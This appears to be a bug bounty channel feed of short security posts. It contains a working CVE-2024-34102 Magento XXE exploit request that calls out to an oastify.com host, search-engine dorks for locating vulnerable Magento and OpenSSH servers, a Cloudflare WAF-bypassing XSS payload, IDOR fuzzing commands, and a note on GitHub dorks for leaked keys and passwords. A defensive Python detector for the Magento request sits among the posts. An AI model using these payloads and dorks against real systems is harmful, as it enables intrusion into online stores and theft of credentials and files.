🔹Web Scanner & Crawler
🔹Fuzzing with Intruder (Part3)
🔹Fuzzing with Intruder (Part2)
🔹Fuzzing with Intruder (Part1)
🔹XSS Validator
🔹Configuring Proxy
🔹Burp Collaborator
🔹HackBar
🔹Burp Sequencer
🔹Turbo Intruder
🔹Engagement Tools
🔹Payload Processing Rule (Part2)
🔹Payload Processing Rule (Part1)
🔹Beginners Guide to Burpsuite Payloads (Part2)
🔹Beginners Guide to Burpsuite Payloads (Part1)
🔹Encoder & Decoder Tutorial
🔹Active Scan++
🔹Software Vulnerability Scanner
🔹Burp’s Project Management
🔹Repeater
👍4🔥2🫡1
🚨Magento XXE CVE-2024-34102: A newly discovered vulnerability dubbed “CosmicSting” jeopardizes millions of online stores built on Adobe Commerce and Magento platforms.
⚠CosmicSting enables attackers to gain unauthorized access to sensitive files, including those containing passwords.
When combined with a recent Linux bug (CVE-2024-2961), the vulnerability can be escalated to remote code execution.
Hunter: product.name="Adobe Magento"
FOFA: app="Adobe-Magento"
SHODAN: http.html:"magento-template"
POST /rest/V1/guest-carts/1/estimate-shipping-methods HTTP/2
Content-Type: application/json
Content-Length: 192
{"address":{"totalsCollector":{"collectorList":{"totalCollector":{"sourceData":
{"data":"http://*.oastify.com/xxe.xml","dataIsURL":true,"options":12345678}}}}}}
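A defender-side check for the request shape shown above, as an added example that is not part of the original post: it walks the JSON body of logged REST requests and flags any nested sourceData object, noting whether dataIsURL is true. The record layout, the /rest/ prefix filter and the callback.example host are assumptions made for this example.

```python
import json

# Key names come from the request above; the record layout is an assumption.
MARKER_KEY = "sourceData"
URL_FLAG = "dataIsURL"

def find_source_data(node, path=""):
    """Yield (json_path, object) for every 'sourceData' object nested in node."""
    if isinstance(node, dict):
        for key, value in node.items():
            here = f"{path}.{key}" if path else key
            if key == MARKER_KEY and isinstance(value, dict):
                yield here, value
            yield from find_source_data(value, here)
    elif isinstance(node, list):
        for i, item in enumerate(node):
            yield from find_source_data(item, f"{path}[{i}]")

def inspect_request(method, path, body):
    """Return findings for one logged request (empty list if nothing matches)."""
    if method != "POST" or not path.startswith("/rest/"):
        return []
    try:
        doc = json.loads(body)
    except (ValueError, TypeError):
        return []  # body is not JSON, so this heuristic does not apply
    return [
        {"json_path": where,
         "remote_fetch": obj.get(URL_FLAG) is True,
         "target": obj.get("data")}
        for where, obj in find_source_data(doc)
    ]

# Constructed sample records: (method, path, raw body). Hosts are placeholders.
SAMPLE_LOG = [
    ("POST", "/rest/V1/guest-carts/abc/estimate-shipping-methods",
     '{"address":{"country_id":"US","postcode":"10001"}}'),
    ("POST", "/rest/V1/guest-carts/1/estimate-shipping-methods",
     '{"address":{"totalsCollector":{"collectorList":{"totalCollector":'
     '{"sourceData":{"data":"http://callback.example/x.xml",'
     '"dataIsURL":true,"options":12345678}}}}}}'),
    ("POST", "/rest/V1/guest-carts/1/estimate-shipping-methods", "{not json"),
]

def scan(records):
    """Return {record_index: findings} for records with at least one finding."""
    results = {i: inspect_request(*rec) for i, rec in enumerate(records)}
    return {i: found for i, found in results.items() if found}

if __name__ == "__main__":
    print(scan(SAMPLE_LOG))
```

A normal shipping-estimate body carries address fields only, so any hit from this heuristic is worth reviewing alongside the server's outbound connections at the same timestamp.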
YouTube
🚨Unauthenticated Magento XXE | CVE-2024-34102 | Bug Bounty POC | Brut Security
🚨Magento XXE CVE-2024-34102: A newly discovered vulnerability
dubbed “CosmicSting” jeopardizes millions of online stores
built on Adobe Commerce and Magento platforms.
⚠CosmicSting enables attackers to gain unauthorized access
to sensitive files, including…
👍6🤯2😱1
#bugbounty #bugbountytips
👍2🤔1
Whoever is commenting that it doesn't work on the latest updates of Firefox, the video is for them only. No offence to anyone, but you guys lack a lot of research!
👍3❤1🔥1
When combined with a recent Linux bug (CVE-2024-2961), the vulnerability can be escalated to remote code execution.
YouTube
Unauthenticated Magento XXE to Path traversal | CVE-2024-34102 | Bug Bounty POC
🔥Magento XXE CVE-2024-34102: A newly discovered vulnerability dubbed “CosmicSting” jeopardizes millions of online stores
built on Adobe Commerce and Magento platforms.
⚠️CosmicSting enables attackers to gain unauthorized access to sensitive files…
👍2😱2
Hope you guys are learning from the resources which I am sharing. If you have any suggestions or questions, you can comment.
Thanks and Regards,
The Brut Security Team☄️
🔥6👍4
When hunting for IDORs during a bug bounty program, consider the following tip:
1. Leverage archive tools: Utilize tools like Wayback Machine or specialized software like Waymore to manually archive and analyze subdomains. This can help uncover hidden or previously accessible endpoints that may now be vulnerable to IDORs.
Example usage:
python3 waymore.py -i sub.target.com -mode U -xcc
2. Extract all paths with specific keywords: After identifying potential paths, extract all URLs containing specific keywords, such as "admin" or "manager," to narrow down your search.
Example command:
cat result.txt | grep "admin"
3. Fuzzing: If you find a suspicious path but it doesn't yield any results, try fuzzing the URL with a wordlist. This can help uncover hidden or unintended parameters.
Example usage:
ffuf -u https://sub.target.com/promo/offer/1234/FUZZ -w wordlist.txt -mc 200
4. Brute force: If you find a path with a dynamic ID, consider brute-forcing the last digits or numbers. This can help uncover additional sensitive information or functionality.
Example scenario:
Found path: https://sub.target.com/promo/offer/1234/details
Brute-force the last 3 digits: 1234
By following these steps, you can uncover hidden or unintended IDORs, leading to potential security vulnerabilities and rewards in bug bounty programs.
🔥8👍1
A payload that bypasses Cloudflare WAF
<img/src=x onError="`${x}`;alert(`Hello`);">
👍11
📢CSPRecon: Discover new target domains using Content Security Policy.
⚠️This project was created for educational purposes and should not be used in environments without legal authorization.
🔗 Download: https://github.com/edoardottt/csprecon
👍7
GitHub
GitHub - v4d1/Dome: Dome - Subdomain Enumeration Tool. Fast and reliable python script that makes active and/or passive scan to…
Dome - Subdomain Enumeration Tool. Fast and reliable python script that makes active and/or passive scan to obtain subdomains and search for open ports. - GitHub - v4d1/Dome: Dome - Subdomain Enum...
🔥3🤡2
⚠️ CVE-2024-6387: Critical OpenSSH Unauthenticated RCE Flaw ‘regreSSHion’ Exposes Millions of Linux Systems
🎯96.4 million+ results are found on en.fofa.info within the last year.
💥FOFA Dork: app="OpenSSH"
🔖Refer: https://lnkd.in/gkENKHPv
ℹ️POC: https://lnkd.in/gzEWNHAX
#OSINT #FOFA #openssh #bugbounty #bugbountytips #cybersecurity #infosec
🔥2
🔥4❤🔥1👍1
🔍List of GitHub Dorks for bug bounties.
📋Finding target Files, Languages, API Keys, Tokens, Usernames, Passwords, Information using Dates, Extension 📓
🔖#infosec #cybersecurity #hacking #pentesting #security
🔥7👍1